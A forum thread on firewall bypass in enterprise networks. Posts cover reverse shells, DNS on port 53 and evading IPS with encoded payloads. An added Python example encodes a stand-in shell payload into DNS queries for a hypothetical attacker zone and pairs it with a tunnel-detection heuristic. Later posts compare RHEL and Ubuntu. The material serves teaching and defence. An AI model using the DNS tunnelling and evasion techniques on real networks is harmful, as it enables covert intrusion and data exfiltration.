By and large, if you're simply talking about standard firewalling and ACLs (not IPS; I'll get into that in a moment), you have two major factors to deal with in a large enterprise network. This is obviously taken from the perspective of an external attacker, so there may be limited, if any, Internet-facing systems, which is where client-side attacks, social engineering, etc. come in. In most cases, if the methods discussed in the original post are carried out properly, i.e. a reverse shell, it will still bypass most corporate firewalls. NAT routing is NAT routing, and if the machine internal to the router has access out, an attacker can get a shell back. That being said, most CCNEs are rather clever (or so they think) and like to do things like IP whitelisting and port whitelisting. Two things on that:
- Most client-side systems (not production systems, unless it's something like a globally accessible web server) will have access to the Internet, so pretty much every IP is fair game when it comes to whitelisting.
- Ports... Okay, even if you block the obvious outbound on 7777, you're not blocking (can't block) 53 UDP, and probably aren't blocking 53 TCP (zone transfers and large DNS requests).
When you get more in depth and start talking about IPS, you need to get more creative to bypass them. You start getting into things like encoding payloads to evade IDS/IPS, and staged payloads. Most of these will effectively bypass even the best enterprise-class IPS solutions if carried out properly (i.e. your payload isn't signatured). Now, if you toss back a reverse netcat or an unencoded Meterpreter, you probably won't have a whole lot of success with a decent IPS, though some older appliances won't pick them up.
Hopefully this helps, but by and large the basic principles in the original article will scale quite well to any size network, bearing in mind that you would be attacking an Internet-facing system or data management zone.
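The two points the post above makes, that outbound 53/UDP is practically never blocked and that an encoded payload slips past string-matching IPS rules, are easier to reason about with the bytes in front of you. The following is an added example written for this page, not code from the poster or from any particular tunnelling tool. It packs an XOR-encoded payload into DNS query names (base32 in labels under the 63-octet limit, a sequence label so the receiver can reorder), builds the RFC 1035 query packet that would go out on 53/UDP, and then shows the resolver-log heuristic a defender would run against the same names. The zone `c2.example.test`, the payload string, the XOR key and the detection thresholds are all constructed for illustration; the encoder is the generic base32-in-labels scheme, not any specific product's protocol.

```python
"""Added example (not from the original thread): a DNS carrier for an XOR-encoded
payload, plus the resolver-side heuristic a defender would run. Zone name,
payload, key and thresholds are constructed for illustration."""
import base64
import math
import struct
from collections import Counter

ZONE = "c2.example.test"          # hypothetical attacker-controlled zone
SAMPLE_PAYLOAD = b"stage2: connect 203.0.113.10:7777; exec /bin/sh"  # constructed stand-in
NAIVE_SIGNATURE = b"/bin/sh"      # the kind of string an IPS content rule might key on
XOR_KEY = b"\x5a\xc3\x19"         # static key, illustrative only


def xor_encode(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Symmetric: the same call decodes. Beats exact-string signatures, not entropy checks."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def signature_hit(blob: bytes, sig: bytes = NAIVE_SIGNATURE) -> bool:
    """What a plain content-match rule does: substring search on the wire bytes."""
    return sig in blob


def encode_to_qnames(data: bytes, zone: str = ZONE, label_len: int = 60,
                     labels_per_query: int = 3) -> list[str]:
    """Pack bytes into QNAMEs of the form <seq>.<b32 label>...<zone>.
    Labels stay under the 63-octet limit and each name under 253 octets."""
    b32 = base64.b32encode(data).decode().lower().rstrip("=")
    per_query = label_len * labels_per_query
    names = []
    for seq, start in enumerate(range(0, len(b32), per_query)):
        chunk = b32[start:start + per_query]
        labels = [chunk[i:i + label_len] for i in range(0, len(chunk), label_len)]
        names.append(".".join([f"{seq:04x}", *labels, zone]))
    return names


def decode_from_qnames(qnames, zone: str = ZONE) -> bytes:
    """Receiver side (the authoritative server for zone): reassemble by sequence label,
    so queries arriving out of order or via different recursive resolvers still decode."""
    suffix = "." + zone
    parts = {}
    for name in qnames:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        parts[int(labels[0], 16)] = "".join(labels[1:])
    b32 = "".join(parts[k] for k in sorted(parts))
    b32 += "=" * (-len(b32) % 8)          # restore the padding stripped on the way out
    return base64.b32decode(b32, casefold=True)


def build_query(qname: str, txid: int = 0x1234) -> bytes:
    """RFC 1035 query: 12-byte header (RD set) plus one QTYPE=TXT, QCLASS=IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.split(".")) + b"\x00"
    return header + question + struct.pack("!HH", 16, 1)


def parse_qname(packet: bytes) -> str:
    """Read the QNAME back out of a query (question sections carry no compression pointers)."""
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(qname: str, max_label: int = 30, max_total: int = 100,
                      min_entropy: float = 3.5) -> bool:
    """Resolver-log heuristic: drop the registered domain (approximated as the last two
    labels) and flag over-long labels, too much subdomain data, or high-entropy labels."""
    sub = qname.split(".")[:-2]
    joined = "".join(sub)
    if not joined:
        return False
    return (any(len(l) > max_label for l in sub)
            or len(joined) > max_total
            or shannon_entropy(joined) > min_entropy)


if __name__ == "__main__":
    encoded = xor_encode(SAMPLE_PAYLOAD)
    print("signature on plaintext:", signature_hit(SAMPLE_PAYLOAD), "/ on encoded:", signature_hit(encoded))
    names = encode_to_qnames(encoded)
    pkt = build_query(names[0])
    print(len(names), "query,", len(pkt), "bytes on the wire, QNAME:", parse_qname(pkt))
    print("round trip ok:", xor_encode(decode_from_qnames(names)) == SAMPLE_PAYLOAD)
    for n in ("www.ubuntu.com", names[0]):
        print("TUNNEL" if looks_like_tunnel(n) else "benign", n[:72])
```

Two things worth noticing when you run it. The plaintext trips the `/bin/sh` content match and the encoded copy does not, which is the whole of the "isn't signatured" argument; it says nothing about IPS engines that score entropy or decoder stubs. And the detector never needs to know the payload: label length alone gives the tunnel away, which is why a resolver log with QNAME lengths is one of the cheapest controls against this channel, along with only permitting 53/UDP to the organisation's own resolvers rather than to the whole Internet.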
We don't use Debian or Ubuntu, for a lot of reasons. The main one being that RHEL is the industry standard in terms of stability and support. Also, bleeding-edge distros like Ubuntu tend to be avoided in production shops.
If you are interested in learning more about businesses that do use Ubuntu or Debian, I know that on the west coast they are becoming pretty popular with small to mid-size
Hope this helps
Fedora is at 16 currently. Do you know what version number RHEL is at now, if it were loosely compared to a Fedora version? Like, is RHEL roughly equivalent to Fedora 10?
Last edited by nrundy; February 18th, 2012 at 04:36 PM.
PS: Shame that Win is like a leaky bucket, so RHEL and a million other things need to be there in the first place for big corps using both. Catch 22/28, I guess. The story is never-ending, that I understand also...
Last edited by Bucky Ball; February 18th, 2012 at 05:10 PM.
To answer both questions: RHEL does have some pretty spiffy tools for enterprises, things like Kickstart, Satellite Server, Red Hat Virtualization, tight integration of JBoss, etc.
That being said, Ubuntu does have some similar tools: Landscape, tighter Cobbler support in 12.04, etc. The LTS versions are more stable, but Ubuntu is the new kid on the block, and when corporations have been using RHEL for 8 or more years it's going to be hard to push a conversion. You can make the finance argument, but a few thousand dollars for RHEL entitlements is a drop in the bucket for companies like that.
As far as Windows goes, it can be rather successful in a corporate environment, and there is no better MTA than Exchange, so you get kind of stuck there.
Hope this helps
Firewall on Ubuntu? No if you want to use it like a normal user; yes if you are very worried about privacy.